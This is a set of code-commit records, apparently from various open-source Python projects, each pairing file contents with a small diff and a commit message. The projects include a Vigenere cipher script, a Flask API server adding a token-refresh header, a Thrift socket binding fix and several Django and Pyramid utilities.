myMode = 'encrypt' # Set to either 'encrypt' or 'decrypt'.
if myMode == 'encrypt':
translated = encryptMessage(myKey, myMessage)
elif myMode == 'decrypt':
translated = decryptMessage(myKey, myMessage)
print('%sed message:' % (myMode.title()))
print(translated)
copy(translated)
print()
print('The message has been copied to the clipboard.')
def encryptMessage(key, message):
return translateMessage(key, message, 'encrypt')
def decryptMessage(key, message):
return translatedMessage(key, message, 'decrypt')
def translateMessage(key, message, mode):
translated = [] # Stores the encrypted/decrypted message string.
keyIndex = 0
key = key.upper()
for symbol in message: # Loop through each symbol in message.
num = LETTERS.find(symbol.upper())
if num != -1: # -1 means symbol.upper() was not found in LETTERS.
if mode == 'encrypt':
num += LETTERS.find(key[keyIndex]) # Add if encrypting.
elif mode == 'decrypt':
num -= LETTERS.find(key[keyIndex]) # Subtract if decrypting.
num %= len(LETTERS) # Handle any wraparound.
# Add the encrypted/decrypted symbol to the end of translated:
if symbol.isupper():
translated.append(LETTERS[num])
elif symbol.islower():
translated.append(LETTERS[num].lower())
keyIndex += 1 # Move to the next letter in the key.
if keyIndex == len(key):
keyIndex = 0
else:
# Append the symbol without encrypting/decrypting:
translated.append(symbol)
return ''.join(translated)
# If vigenereCipher.py is run (instead of imported as a module), call
# the main() function:
if __name__ = '__main__':
main()
|
Python
| 0.000001
|
@@ -2255,16 +2255,17 @@
name__ =
+=
'__main
|
41126795dec28c8c81f225f65589ba7aa264b4a6
|
allow any test sample size for cold start scenario
|
polara/recommender/coldstart/data.py
|
polara/recommender/coldstart/data.py
|
from collections import namedtuple
import numpy as np
import pandas as pd
from polara.recommender.data import RecommenderData
class ItemColdStartData(RecommenderData):
def __init__(self, *args, **kwargs):
random_state = kwargs.pop('random_state', None)
super(ItemColdStartData, self).__init__(*args, **kwargs)
self._test_sample = 1
self._test_unseen_users = False
self.random_state = random_state
try:
permute = self.random_state.permutation
except AttributeError:
permute = np.random.permutation
# build unique items list to split them by folds
itemid = self.fields.itemid
self._unique_items = permute(self._data[itemid].unique())
def _split_test_index(self):
userid = self.fields.userid
itemid = self.fields.itemid
item_idx = np.arange(len(self._unique_items))
cold_items_split = self._split_fold_index(item_idx, len(item_idx), self._test_fold, self._test_ratio)
cold_items = self._unique_items[cold_items_split]
cold_items_mask = self._data[itemid].isin(cold_items)
return cold_items_mask
def _split_data(self):
assert self._test_ratio > 0
assert self._test_sample > 1
assert not self._test_unseen_users
update_rule = super(ItemColdStartData, self)._split_data()
if any(update_rule.values()):
testset = self._sample_test_items()
self._test = self._test._replace(testset=testset)
return update_rule
def _sample_test_items(self):
userid = self.fields.userid
itemid = self.fields.itemid
test_split = self._test_split
holdout = self.test.evalset
user_has_cold_item = self._data[userid].isin(holdout[userid].unique())
sampled = super(ItemColdStartData, self)._sample_testset(user_has_cold_item, holdout.index)
testset = (pd.merge(holdout[[userid, itemid]],
sampled[[userid, itemid]],
on=userid, how='inner',
suffixes=('_cold', ''))
.drop(userid, axis=1)
.drop_duplicates()
.sort_values('{}_cold'.format(itemid)))
return testset
def _sample_holdout(self, test_split):
return self._data.loc[test_split, list(self.fields)]
def _try_drop_unseen_test_items(self):
# there will be no such items except cold-start items
pass
def _try_drop_invalid_test_users(self):
# testset contains items only
pass
def _try_sort_test_data(self):
# no need to sort by users
pass
def _assign_test_items_index(self):
itemid = self.fields.itemid
self._map_entity(itemid, self._test.testset)
self._reindex_cold_items() # instead of trying to assign known items index
def _assign_test_users_index(self):
# skip testset as it doesn't contain users
userid = self.fields.userid
self._map_entity(userid, self._test.evalset)
def _reindex_cold_items(self):
itemid_cold = '{}_cold'.format(itemid)
cold_item_index = self.reindex(self.test.testset, itemid_cold, inplace=True, sort=False)
new_item_index = (namedtuple('ItemIndex', 'training cold_start')
._make([self.index.itemid, cold_item_index]))
self.index = self.index._replace(itemid=new_item_index)
|
Python
| 0
|
@@ -1231,45 +1231,8 @@
%3E 0%0A
- assert self._test_sample %3E 1%0A
|
abf8f8638e84992a8a290534074d999c817d5ae7
|
Add token refresh support
|
src/b2share_server.py
|
src/b2share_server.py
|
# -*- coding: utf-8 -*-
from flask import Flask
from flask import request
from flask.ext.jsonpify import jsonify
from flask import Response, g, redirect, url_for, make_response
from werkzeug.routing import Rule
from functools import wraps
from model import User, Deposit
import json, sys
app = Flask(__name__)
# default headers
headers = {'Content-Type': 'application/json; charset=utf-8',
'Access-Control-Allow-Origin': 'http://localhost:8000',
'Access-Control-Allow-Headers': 'Content-Type, Authorization',
'Server': 'EUDAT-B2SHARE/UI-API-1.1.1'}
# helpers for response headers
def add_response_headers(headers={}):
def decorator(f):
@wraps(f)
def decorated_function(*args, **kwargs):
resp = make_response(f(*args, **kwargs))
h = resp.headers
for header, value in headers.items():
h[header] = value
return resp
return decorated_function
return decorator
def default_headers(f):
@wraps(f)
@add_response_headers(headers)
def decorated_function(*args, **kwargs):
return f(*args, **kwargs)
return decorated_function
class Helper(object):
@classmethod
def abort(cls, code, error_msg, base):
jj = jsonify({'error': {"message": error_msg, "base": base }})
return jj, code
@classmethod
def user_authentication(cls):
# get auth header
auth = request.headers.get('Authorization', None)
prefix = "B2SHARE"
token = None
# strip prefix
if auth and auth[0:len(prefix)] == prefix:
token = auth[len(prefix)+1:]
# load user that matches token
user = User.find_user(token=token)
# return token, user tuple
return (token, user)
# server payload
class B2shareServer(object):
@classmethod
def serve(cls):
# debug = reloading on codechange
app.run(debug = True, host='0.0.0.0')
# USER
# @app.endpoint('user#index')
# @default_headers
# def user_index():
# json = jsonify(Factory.users())
# return json, 200
@app.endpoint('user#authenticate')
@default_headers
def user_login(methods=["POST", "OPTIONS"]):
if request.method == "OPTIONS":
return jsonify({}), 200
try:
jdata = json.loads(request.data)
user = User.find_user(email=jdata['email'], password=jdata['password'])
if user == None:
return Helper.abort(401, "Unauthorized", base="Invalid credentials")
return user.to_json(), 200
except KeyError:
return Helper.abort(400, "Bad Request", base="Invalid credentials")
# DEPOSIT
@app.endpoint('deposit#index')
@default_headers
def deposit_index(methods=["GET", "OPTIONS"]):
if request.method == "OPTIONS":
return jsonify({}), 200
try:
# authentication
token, user = Helper.user_authentication()
if token and user == None:
return Helper.abort(401, "Unauthorized", base="Invalid credentials")
# ordering
order_by = request.args.get('order_by', 'created_at')
order = request.args.get('order', 'desc')
# pagination
size = int(request.args.get('page_size', 10))
if size > 10 and size < 1:
size = 10
page = int(request.args.get('page', 1))
if page < 1:
page = 1
# get deposit
ds = Deposit.get_deposits(size=size, page=page, order_by=order_by,
order=order, user=user)
return Deposit.to_deposits_json(ds), 200
except:
return Helper.abort(500, "Internal Server Error", base="Internal Server Error")
@app.endpoint('deposit#deposit')
@default_headers
def deposit(methods=["GET", "OPTIONS"]):
if request.method == "OPTIONS":
return jsonify({}), 200
try:
# authentication
token, user = Helper.user_authentication()
if token and user == None:
return Helper.abort(401, "Unauthorized", base="Invalid credentials")
# request
uuid = request.args.get('uuid', None)
if uuid == None:
return Helper.abort(400, "Bad Request", base="Unknown Deposit request")
deposit = Deposit.find_deposit(uuid=uuid, user=user)
if deposit == None:
return Helper.abort(404, "Not Found", base="Deposit not found")
resp = Response(deposit.to_json())
resp.code = 200
if user:
resp.headers['Token'] = "B2SHARE " + user.get_token()
return resp
except:
return Helper.abort(500, "Internal Server Error", base="Internal Server Error")
@app.route("/")
@default_headers
def index():
return Helper.abort(404, "Not Found", base="Not found")
# routes
# app.url_map.add(Rule('/users.json', endpoint="user#index"))
app.url_map.add(Rule('/user/authenticate.json', endpoint="user#authenticate"))
app.url_map.add(Rule('/deposit/index.json', endpoint="deposit#index"))
app.url_map.add(Rule('/deposit/deposit.json', endpoint="deposit#deposit"))
|
Python
| 0
|
@@ -515,16 +515,64 @@
ation',%0A
+ 'Access-Control-Expose-Headers': 'X-Token',%0A
'Ser
@@ -607,16 +607,16 @@
1.1.1'%7D%0A
-
%0A# helpe
@@ -2599,32 +2599,34 @@
ls%22)%0A
+ #
return user.to_
@@ -2633,24 +2633,188 @@
json(), 200%0A
+ resp = Response(user.to_json())%0A resp.code = 200%0A resp.headers%5B'X-Token'%5D = %22B2SHARE %22 + user.get_token()%0A return resp%0A
exce
@@ -3878,21 +3878,30 @@
re
-turn
+sp = Response(
Deposit.
@@ -3920,21 +3920,162 @@
json(ds)
-, 200
+)%0A resp.code = 200%0A if user:%0A resp.headers%5B'X-Token'%5D = %22B2SHARE %22 + user.get_token()%0A return resp
%0A
@@ -5032,32 +5032,32 @@
if user:%0A
-
@@ -5070,16 +5070,18 @@
eaders%5B'
+X-
Token'%5D
|
ae92abffcbe792d41ee7aafb08e59ba874f3a4c4
|
Fix migration dependencies
|
longclaw/basket/migrations/0003_auto_20170207_2053.py
|
longclaw/basket/migrations/0003_auto_20170207_2053.py
|
# -*- coding: utf-8 -*-
# Generated by Django 1.10.4 on 2017-02-07 20:53
from __future__ import unicode_literals
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('basket', '0002_basketitem_product'),
]
operations = [
migrations.RenameField(
model_name='basketitem',
old_name='product',
new_name='variant',
),
]
|
Python
| 0.000013
|
@@ -230,28 +230,17 @@
'000
-2_basketitem_product
+1_initial
'),%0A
|
0f70333ec715b75c5c5e0883e0c7a62584c13a70
|
add extentions to hire me route
|
portfolio/portfolio/views/default.py
|
portfolio/portfolio/views/default.py
|
"""Views for profolio app."""
import datetime
import json
import markdown
from bs4 import BeautifulSoup
from pyramid.httpexceptions import HTTPFound
from pyramid.response import Response
from pyramid.security import remember, forget
from pyramid.view import view_config
from sqlalchemy.exc import DBAPIError
from ..models import BlogPost
from ..security import check_credentials
from pyramid_mailer.message import Message
from pyramid.httpexceptions import HTTPNotFound
extensions = ['markdown.extensions.codehilite', 'markdown.extensions.tables']
def get_summary(html):
"""Return summary portion of BlogPost."""
soup = BeautifulSoup(html, "html5lib")
if not soup.summary:
return html
return str(soup.summary)
@view_config(route_name="posts",
renderer="../templates/posts.jinja2",
permission="view")
def posts(request):
"""View for listing all the posts."""
try:
query = request.dbsession.query(BlogPost)
posts = []
for x in query.all()[::-1]:
posts.append({
"title": x.title,
"date": str(x.date),
"summary": get_summary(x.html),
"id": x.id
})
except DBAPIError:
return Response('It don\'t work right.', content_type='text/plain', status=500)
return {'posts': posts}
@view_config(route_name="detail",
renderer="../templates/post.jinja2",
permission="view")
def detail(request):
"""View for the detail page."""
query = request.dbsession.query(BlogPost)
post = query.filter(BlogPost.id == request.matchdict['id']).first()
if post:
return {"post": post}
return HTTPNotFound()
@view_config(route_name="create",
renderer="json",
permission="create")
def create(request):
"""View for new BlogPost page."""
if request.method == "POST":
post_dict_keys = list(request.POST.keys())
if "title" in post_dict_keys and "body" in post_dict_keys:
title = request.POST["title"]
html = markdown.markdown(request.POST["body"],
extensions=extensions)
date = datetime.date.today()
new_model = BlogPost(title=title, body=request.POST["body"], html=html, date=date)
request.dbsession.add(new_model)
id = request.dbsession.query(BlogPost).filter(BlogPost.title == title).first().id
return {"id": id}
return {}
@view_config(route_name="update",
permission="update")
def update(request):
"""View for update page."""
if request.method == "POST":
title = request.POST["title"]
html = markdown.markdown(request.POST["body"],
extensions=extensions)
query = request.dbsession.query(BlogPost)
post_dict = query.filter(BlogPost.id == request.matchdict['id'])
post_dict.update({"title": title,
"body": request.POST["body"],
"html": html})
return HTTPFound(location=request.route_url('home'))
return {}
@view_config(route_name='home',
renderer='../templates/home.jinja2',
permission="view")
def home(request):
"""Home Page View."""
return {}
@view_config(route_name='login',
renderer='../templates/login.jinja2',
require_csrf=False,
permission="view")
def login(request):
"""Login View."""
if request.method == 'POST':
username = request.params.get('Username', '')
password = request.params.get('Password', '')
if check_credentials(username, password):
headers = remember(request, username)
return HTTPFound(location=request.route_url('posts'),
headers=headers)
return {}
@view_config(route_name='logout',
permission="view")
def logout(request):
"""Logout view."""
headers = forget(request)
return HTTPFound(request.route_url('home'), headers=headers)
@view_config(route_name="api_list",
renderer="json",
permission="view")
def api_list_view(request):
"""JSON."""
posts = request.dbsession.query(BlogPost).all()
output = [item.to_json() for item in posts]
if output:
return output
return HTTPNotFound()
@view_config(route_name="api_post",
renderer="json",
permission="view")
def api_post_view(request):
"""JSON."""
query = request.dbsession.query(BlogPost)
post = query.filter(BlogPost.id == request.matchdict['id']).first()
if post:
if request.params.get('summary') == 'True':
return json.dumps({"summary": get_summary(post.html)})
post = post.to_json()
return post
return HTTPNotFound()
@view_config(route_name="email",
renderer="json",
require_csrf=False,
permission="view")
def hire_me(request):
"""Send email and text for hire me button."""
if request.method == "POST":
post_dict_keys = list(request.POST.keys())
if "email" in post_dict_keys and "body" in post_dict_keys and "subject" in post_dict_keys:
email = request.POST["email"]
html = markdown.markdown(request.POST["body"],
extensions=['tables'])
subject = request.POST["subject"]
message = Message(subject=subject,
sender='admin@mysite.com',
recipients=["amosboldor@gmail.com"],
body=email + '\n' + html)
request.mailer.send(message)
return {}
return {}
@view_config(route_name='projects',
renderer='../templates/projects.jinja2',
permission='view')
def projects(request):
"""Display projects."""
return {}
@view_config(route_name='delete',
permission='delete')
def delete_post(request):
"""Delete a blog post."""
if request.method == "DELETE":
query = request.dbsession.query(BlogPost)
post = query.filter(BlogPost.id == request.matchdict['id']).first()
request.dbsession.delete(post)
return HTTPFound(location=request.route_url('home'))
return {}
|
Python
| 0
|
@@ -5405,18 +5405,18 @@
ons=
-%5B'tables'%5D
+extensions
)%0A
|
4177655955f38eae919627bd75e0ee7a0c37c0c5
|
Simplify loading logger
|
calaccess_raw/management/commands/loadcalaccessrawfile.py
|
calaccess_raw/management/commands/loadcalaccessrawfile.py
|
import csv
from django.db import connection
from django.db.models.loading import get_model
from django.core.management.base import LabelCommand
from calaccess_raw.management.commands import CalAccessCommand
class Command(CalAccessCommand, LabelCommand):
help = 'Load a cleaned CalAccess file for a model into the database'
args = '<model name>'
# Trick for reformating date strings in source data so that they can
# be gobbled up by MySQL. You'll see how below.
date_sql = "DATE_FORMAT(str_to_date(@`%s`, '%%c/%%e/%%Y'), '%%Y-%%m-%%d')"
def handle_label(self, label, **options):
self.verbosity = options.get("verbosity")
self.load(label)
def load(self, model_name):
"""
Loads the source CSV for the provided model.
"""
if self.verbosity:
self.log(" Loading %s" % model_name)
model = get_model("calaccess_raw", model_name)
csv_path = model.objects.get_csv_path()
# Flush
c = connection.cursor()
c.execute('TRUNCATE TABLE %s' % model._meta.db_table)
# Build the MySQL LOAD DATA INFILE command
bulk_sql_load_part_1 = '''
LOAD DATA LOCAL INFILE '%s'
INTO TABLE %s
FIELDS TERMINATED BY ','
OPTIONALLY ENCLOSED BY '"'
LINES TERMINATED BY '\\r\\n'
IGNORE 1 LINES
(
''' % (csv_path, model._meta.db_table)
infile = open(csv_path)
csv_reader = csv.reader(infile)
headers = csv_reader.next()
infile.close()
infile = open(csv_path)
csv_record_cnt = len(infile.readlines()) - 1
infile.close()
header_sql_list = []
date_set_list = []
for h in headers:
# If it is a date field, we need to reformat the data
# so that MySQL will properly parse it on the way in.
if h in model.DATE_FIELDS:
header_sql_list.append('@`%s`' % h)
date_set_list.append(
"`%s` = %s" % (h, self.date_sql % h)
)
else:
header_sql_list.append('`%s`' % h)
bulk_sql_load = bulk_sql_load_part_1 + ','.join(header_sql_list) + ')'
if date_set_list:
bulk_sql_load += " set %s" % ",".join(date_set_list)
# Run the query
cnt = c.execute(bulk_sql_load)
# Report back on how we did
if self.verbosity:
if cnt == csv_record_cnt:
self.success(" Table record count matches CSV")
else:
msg = ' Table Record count doesn\'t match CSV. \
Table: %s\tCSV: %s'
self.failure(msg % (
cnt,
csv_record_cnt,
))
|
Python
| 0.000025
|
@@ -2481,17 +2481,17 @@
if cnt
-=
+!
= csv_re
@@ -2504,91 +2504,8 @@
nt:%0A
- self.success(%22 Table record count matches CSV%22)%0A else:%0A
|
20003796eb8f3949d931a4b8752fb07f2be39136
|
Update utils.py
|
church/utils.py
|
church/utils.py
|
from functools import lru_cache
from os.path import (
join,
dirname,
abspath
)
PATH = abspath(join(dirname(__file__), 'data'))
__all__ = ['priest']
@lru_cache(maxsize=None)
def pull(filename, lang='en_us'):
"""
Function for getting data from text files in data/
1. de_de - Folder for Germany.
2. en_us - Folder for United States
3. ru_ru - Folder for Russian Federation.
"""
with open(join(PATH + '/' + lang, filename), 'r') as f:
_result = f.readlines()
return _result
|
Python
| 0.000001
|
@@ -138,29 +138,8 @@
))%0A%0A
-__all__ = %5B'priest'%5D%0A
%0A%0A@l
@@ -490,16 +490,17 @@
return _result
+%0A
|
7433bc7f2cb0e71d8b9440ec5df8164533917fb3
|
Use global options for determining dry_run
|
inspectors/utils/inspector.py
|
inspectors/utils/inspector.py
|
from utils import utils
import os
import re
import logging
import datetime
import urllib.parse
# Save a report to disk, provide output along the way.
#
# 1) download report to disk
# 2) extract text from downloaded report using report['file_type']
# 3) write report metadata to disk
#
# fields used: file_type, url, inspector, year, report_id
# fields added: report_path, text_path
def save_report(report, options=None):
options = {} if not options else options
# create some inferred fields, set defaults
preprocess_report(report)
# validate report will return True, or a string message
validation = validate_report(report)
if validation != True:
raise Exception("[%s][%s][%s] Invalid report: %s\n\n%s" % (report.get('type', None), report.get('published_on', None), report.get('report_id', None), validation, str(report)))
logging.warn("[%s][%s][%s]" % (report['type'], report['published_on'], report['report_id']))
if options.get('dry_run'):
logging.warn('\tskipping download and extraction, dry_run == True')
else:
report_path = download_report(report)
if not report_path:
logging.warn("\terror downloading report: sadly, skipping.")
return False
logging.warn("\treport: %s" % report_path)
text_path = extract_report(report)
logging.warn("\ttext: %s" % text_path)
data_path = write_report(report)
logging.warn("\tdata: %s" % data_path)
return True
# Preprocess before validation, to catch cases where inference didn't work.
# So, fields may be absent at this time.
def preprocess_report(report):
# not sure what I'm doing with this field yet
if report.get("type", None) is None:
report["type"] = "report"
# if we have a date, but no explicit year, extract it
if report.get("published_on", None) and (report.get('year', None) is None):
report['year'] = year_from(report)
# if we have a URL, but no explicit file type, try to detect it
if report.get("url", None) and (report.get("file_type", None) is None):
parsed = urllib.parse.urlparse(report['url'])
split = parsed.path.split(".")
if len(split) > 1:
report['file_type'] = split[-1]
# Ensure required fields are present
def validate_report(report):
required = [
"published_on", "report_id", "title", "url",
"inspector", "inspector_url", "agency", "agency_name",
]
for field in required:
value = report.get(field, None)
if (value is None) or value == "":
return "Missing a required field: %s" % field
# report_id can't have slashes, it'll mess up the directory structure
if "/" in report["report_id"]:
return "Invalid / in report_id - find another way: %s" % report["report_id"]
if report.get("year", None) is None:
return "Couldn't get `year`, for some reason."
if report.get("type", None) is None:
return "Er, this shouldn't happen: empty `type` field."
if report.get("file_type", None) is None:
return "Couldn't figure out `file_type` from URL, please set it explicitly."
try:
datetime.datetime.strptime(report['published_on'], "%Y-%m-%d")
except ValueError:
return "Invalid format for `published_on`, must be YYYY-MM-DD."
if re.search("(\\-\\d[\\-]|\\-\\d$)", report["published_on"]):
return "Invalid format for `published_on`, dates must use zero prefixing."
return True
def download_report(report):
report_path = path_for(report, report['file_type'])
binary = (report['file_type'].lower() == 'pdf')
result = utils.download(
report['url'],
"%s/%s" % (utils.data_dir(), report_path),
{'binary': binary}
)
if result:
return report_path
else:
return None
# relies on putting text next to report_path
def extract_report(report):
report_path = path_for(report, report['file_type'])
file_type_lower = report['file_type'].lower()
if file_type_lower == "pdf":
return utils.text_from_pdf(report_path)
elif file_type_lower.startswith("htm"):
return utils.text_from_html(report_path)
else:
logging.warn("Unknown file type, don't know how to extract text!")
return None
def write_report(report):
data_path = path_for(report, "json")
utils.write(
utils.json_for(report),
"%s/%s" % (utils.data_dir(), data_path)
)
return data_path
def path_for(report, ext):
return "%s/%s/%s/report.%s" % (report['inspector'], report['year'], report['report_id'], ext)
def cache(inspector, path):
return os.path.join(utils.cache_dir(), inspector, path)
# get year for a report from its publish date
def year_from(report):
return int(report['published_on'].split("-")[0])
# assume standard options for IG scrapers, since/year
def year_range(options):
this_year = datetime.datetime.now().year
since = options.get('since', None)
if type(since) is not str: since = None
if since:
since = int(since)
if since > this_year:
since = this_year
year = options.get('year', None)
if year:
year = int(year)
if year > this_year:
year = this_year
if since:
year_range = list(range(since, this_year + 1))
elif year:
year_range = list(range(year, year + 1))
else:
year_range = list(range(this_year, this_year + 1))
return year_range
|
Python
| 0
|
@@ -403,22 +403,8 @@
port
-, options=None
):%0A
@@ -418,38 +418,23 @@
s =
-%7B%7D if not options else
+utils.
options
+()
%0A%0A
|
3c978eab962ed8a6158df2266852a1b1a47c4ec7
|
add more terminal nodes
|
gdcdatamodel/query.py
|
gdcdatamodel/query.py
|
from psqlgraph import Node, Edge
traversals = {}
terminal_nodes = ['annotations', 'centers', 'archives', 'tissue_source_sites',
'files', 'related_files', 'describing_files']
def construct_traversals(root, node, visited, path):
recurse = lambda neighbor: (
neighbor
# no backtracking
and neighbor not in visited
and neighbor != node
# no traveling THROUGH terminal nodes
and (path[-1] not in terminal_nodes
if path else neighbor.label not in terminal_nodes))
for edge in Edge._get_edges_with_src(node.__name__):
neighbor = [n for n in Node.get_subclasses()
if n.__name__ == edge.__dst_class__][0]
if recurse(neighbor):
construct_traversals(
root, neighbor, visited+[node], path+[edge.__src_dst_assoc__])
for edge in Edge._get_edges_with_dst(node.__name__):
neighbor = [n for n in Node.get_subclasses()
if n.__name__ == edge.__src_class__][0]
if recurse(neighbor):
construct_traversals(
root, neighbor, visited+[node], path+[edge.__dst_src_assoc__])
traversals[root][node.label] = traversals[root].get(node.label) or set()
traversals[root][node.label].add('.'.join(path))
for node in Node.get_subclasses():
traversals[node.label] = {}
construct_traversals(node.label, node, [node], [])
def union_subq_without_path(q, *args, **kwargs):
return q.except_(union_subq_path(q, *args, **kwargs))
def union_subq_path(q, dst_label, post_filters=[]):
src_label = q.entity().label
if not traversals.get(src_label, {}).get(dst_label, {}):
return q
paths = list(traversals[src_label][dst_label])
base = q.subq_path(paths.pop(), post_filters)
while paths:
base = base.union(q.subq_path(paths.pop(), post_filters))
return base
|
Python
| 0
|
@@ -184,16 +184,505 @@
g_files'
+,%0A 'clinical_metadata_files', 'experiment_metadata_files', 'run_metadata_files',%0A 'analysis_metadata_files', 'biospecimen_metadata_files', 'aligned_reads_metrics',%0A 'read_group_metrics', 'pathology_reports', 'simple_germline_variations',%0A 'aligned_reads_indexes', 'mirna_expressions', 'exon_expressions',%0A 'simple_somatic_mutations', 'gene_expressions', 'aggregated_somatic_mutations',%0A
%5D%0A%0A%0Adef
@@ -1024,16 +1024,134 @@
l_nodes)
+%0A and (not path%5B-1%5D.startswith('_related')%0A if path else not neighbor.label.startswith('_related'))
)%0A%0A f
|
7c6c8e9ed2b89c7fa15992b5b68c793a53b327d8
|
fix test case to run on_commit hook before assertion
|
django_datawatch/tests/test_trigger_update.py
|
django_datawatch/tests/test_trigger_update.py
|
# -*- coding: UTF-8 -*-
from __future__ import unicode_literals, print_function
from django_datawatch.backends.base import BaseBackend
try:
from unittest import mock
except ImportError:
import mock
from django.test.testcases import TestCase, override_settings
from django_datawatch.datawatch import datawatch, run_checks
from django_datawatch.base import BaseCheck
from django_datawatch.models import Result
@datawatch.register
class CheckTriggerUpdate(BaseCheck):
model_class = Result
trigger_update = dict(foobar=Result)
def get_foobar_payload(self, instance):
return instance
def get_identifier(self, payload):
return payload.pk
def check(self, payload):
return payload
class TriggerUpdateTestCase(TestCase):
@override_settings(DJANGO_DATAWATCH_RUN_SIGNALS=True)
@mock.patch('django_datawatch.datawatch.DatawatchHandler.update_related')
def test_setting_run_signals_true(self, mock_update):
run_checks(sender=None, instance=None, created=None, raw=None,
using=None)
self.assertTrue(mock_update.called)
@override_settings(DJANGO_DATAWATCH_RUN_SIGNALS=False)
@mock.patch('django_datawatch.datawatch.DatawatchHandler.update_related')
def test_setting_run_signals_false(self, mock_update):
run_checks(sender=None, instance=None, created=None, raw=None,
using=None)
self.assertFalse(mock_update.called)
@override_settings(DJANGO_DATAWATCH_RUN_SIGNALS=True)
@mock.patch('django_datawatch.datawatch.DatawatchHandler.get_backend')
def test_update_related_calls_backend(self, mock_get_backend):
backend = mock.Mock(spec=BaseBackend)
mock_get_backend.return_value = backend
datawatch.update_related(sender=Result, instance=Result())
self.assertTrue(backend.run.called)
|
Python
| 0.000001
|
@@ -78,64 +78,8 @@
on%0A%0A
-from django_datawatch.backends.base import BaseBackend%0A%0A
try:
@@ -146,16 +146,50 @@
t mock%0A%0A
+from django.db import transaction%0A
from dja
@@ -243,16 +243,71 @@
ttings%0A%0A
+from django_datawatch.backends.base import BaseBackend%0A
from dja
@@ -1478,32 +1478,535 @@
update.called)%0A%0A
+ def run_commit_hooks(self):%0A %22%22%22%0A Fake transaction commit to run delayed on_commit functions%0A %0A source: https://medium.com/@juan.madurga/speed-up-django-transaction-hooks-tests-6de4a558ef96%0A %22%22%22%0A for db_name in reversed(self._databases_names()):%0A with mock.patch('django.db.backends.base.base.BaseDatabaseWrapper.validate_no_atomic_block', lambda a: False):%0A transaction.get_connection(using=db_name).run_and_clear_commit_hooks()%0A%0A
@override_se
@@ -2283,16 +2283,16 @@
backend%0A
-
@@ -2349,16 +2349,130 @@
esult())
+%0A%0A # run our on_commit hook%0A self.run_commit_hooks()%0A%0A # make sure that we called backend.run
%0A
|
26549566bc502dece76ad596126b219dc5c8991c
|
Fix for IPv6 Python sockets binding localhost problem
|
lib/py/src/transport/TSocket.py
|
lib/py/src/transport/TSocket.py
|
#!/usr/bin/env python
#
# Copyright (c) 2006- Facebook
# Distributed under the Thrift Software License
#
# See accompanying file LICENSE or visit the Thrift site at:
# http://developers.facebook.com/thrift/
from TTransport import *
import socket
class TSocket(TTransportBase):
"""Socket implementation of TTransport base."""
def __init__(self, host='localhost', port=9090):
self.host = host
self.port = port
self.handle = None
def setHandle(self, h):
self.handle = h
def isOpen(self):
return self.handle != None
def setTimeout(self, ms):
if (self.handle != None):
self.handle.settimeout(ms/1000.00)
else:
raise TTransportException(TTransportException.NOT_OPEN, 'No handle yet in TSocket')
def open(self):
try:
res0 = socket.getaddrinfo(self.host, self.port, socket.AF_UNSPEC, socket.SOCK_STREAM)
for res in res0:
self.handle = socket.socket(res[0], res[1])
try:
self.handle.connect(res[4])
except socket.error, e:
if res is not res0[-1]:
continue
else:
raise e
break
except socket.error, e:
raise TTransportException(TTransportException.NOT_OPEN, 'Could not connect to %s:%d' % (self.host, self.port))
def close(self):
if self.handle != None:
self.handle.close()
self.handle = None
def read(self, sz):
buff = self.handle.recv(sz)
if len(buff) == 0:
raise TTransportException('TSocket read 0 bytes')
return buff
def write(self, buff):
sent = 0
have = len(buff)
while sent < have:
plus = self.handle.send(buff)
if plus == 0:
raise TTransportException('TSocket sent 0 bytes')
sent += plus
buff = buff[plus:]
def flush(self):
pass
class TServerSocket(TServerTransportBase):
"""Socket implementation of TServerTransport base."""
def __init__(self, port):
self.port = port
self.handle = None
def listen(self):
res0 = socket.getaddrinfo(None, self.port, socket.AF_UNSPEC, socket.SOCK_STREAM)
for res in res0:
if res[0] is socket.AF_INET6 or res is res0[-1]:
break
self.handle = socket.socket(res[0], res[1])
self.handle.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
if hasattr(self.handle, 'set_timeout'):
self.handle.set_timeout(None)
self.handle.bind(res[4])
self.handle.listen(128)
def accept(self):
(client, addr) = self.handle.accept()
result = TSocket()
result.setHandle(client)
return result
def close(self):
self.handle.close()
self.handle = None
|
Python
| 0.000001
|
@@ -853,24 +853,46 @@
.SOCK_STREAM
+, 0, socket.AI_PASSIVE
)%0A for
|
2323699ae6b266823b30784293b2d1d900d94700
|
Bump aioTV version.
|
rest_framework_swagger/__init__.py
|
rest_framework_swagger/__init__.py
|
VERSION = '0.3.5-aio-v2'
DEFAULT_SWAGGER_SETTINGS = {
'exclude_namespaces': [],
'api_version': '',
'api_key': '',
'token_type': 'Token',
'enabled_methods': ['get', 'post', 'put', 'patch', 'delete'],
'is_authenticated': False,
'is_superuser': False,
'permission_denied_handler': None,
'resource_access_handler': None,
'template_path': 'rest_framework_swagger/index.html',
'doc_expansion': 'none',
'base_path': ''
}
try:
from django.conf import settings
from django.test.signals import setting_changed
def load_settings(provided_settings):
global SWAGGER_SETTINGS
SWAGGER_SETTINGS = provided_settings
for key, value in DEFAULT_SWAGGER_SETTINGS.items():
if key not in SWAGGER_SETTINGS:
SWAGGER_SETTINGS[key] = value
def reload_settings(*args, **kwargs):
setting, value = kwargs['setting'], kwargs['value']
if setting == 'SWAGGER_SETTINGS':
load_settings(value)
load_settings(getattr(settings,
'SWAGGER_SETTINGS',
DEFAULT_SWAGGER_SETTINGS))
setting_changed.connect(reload_settings)
except:
SWAGGER_SETTINGS = DEFAULT_SWAGGER_SETTINGS
|
Python
| 0
|
@@ -19,9 +19,9 @@
io-v
-2
+3
'%0A%0AD
|
e4c1a22c9f4681ffdd2156eb8634ed1a79995d19
|
Fix a bug.
|
datapipe/optimization/bruteforce.py
|
datapipe/optimization/bruteforce.py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# Copyright (c) 2016 Jérémie DECOCK (http://www.jdhp.org)
# This script is provided under the terms and conditions of the MIT license:
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
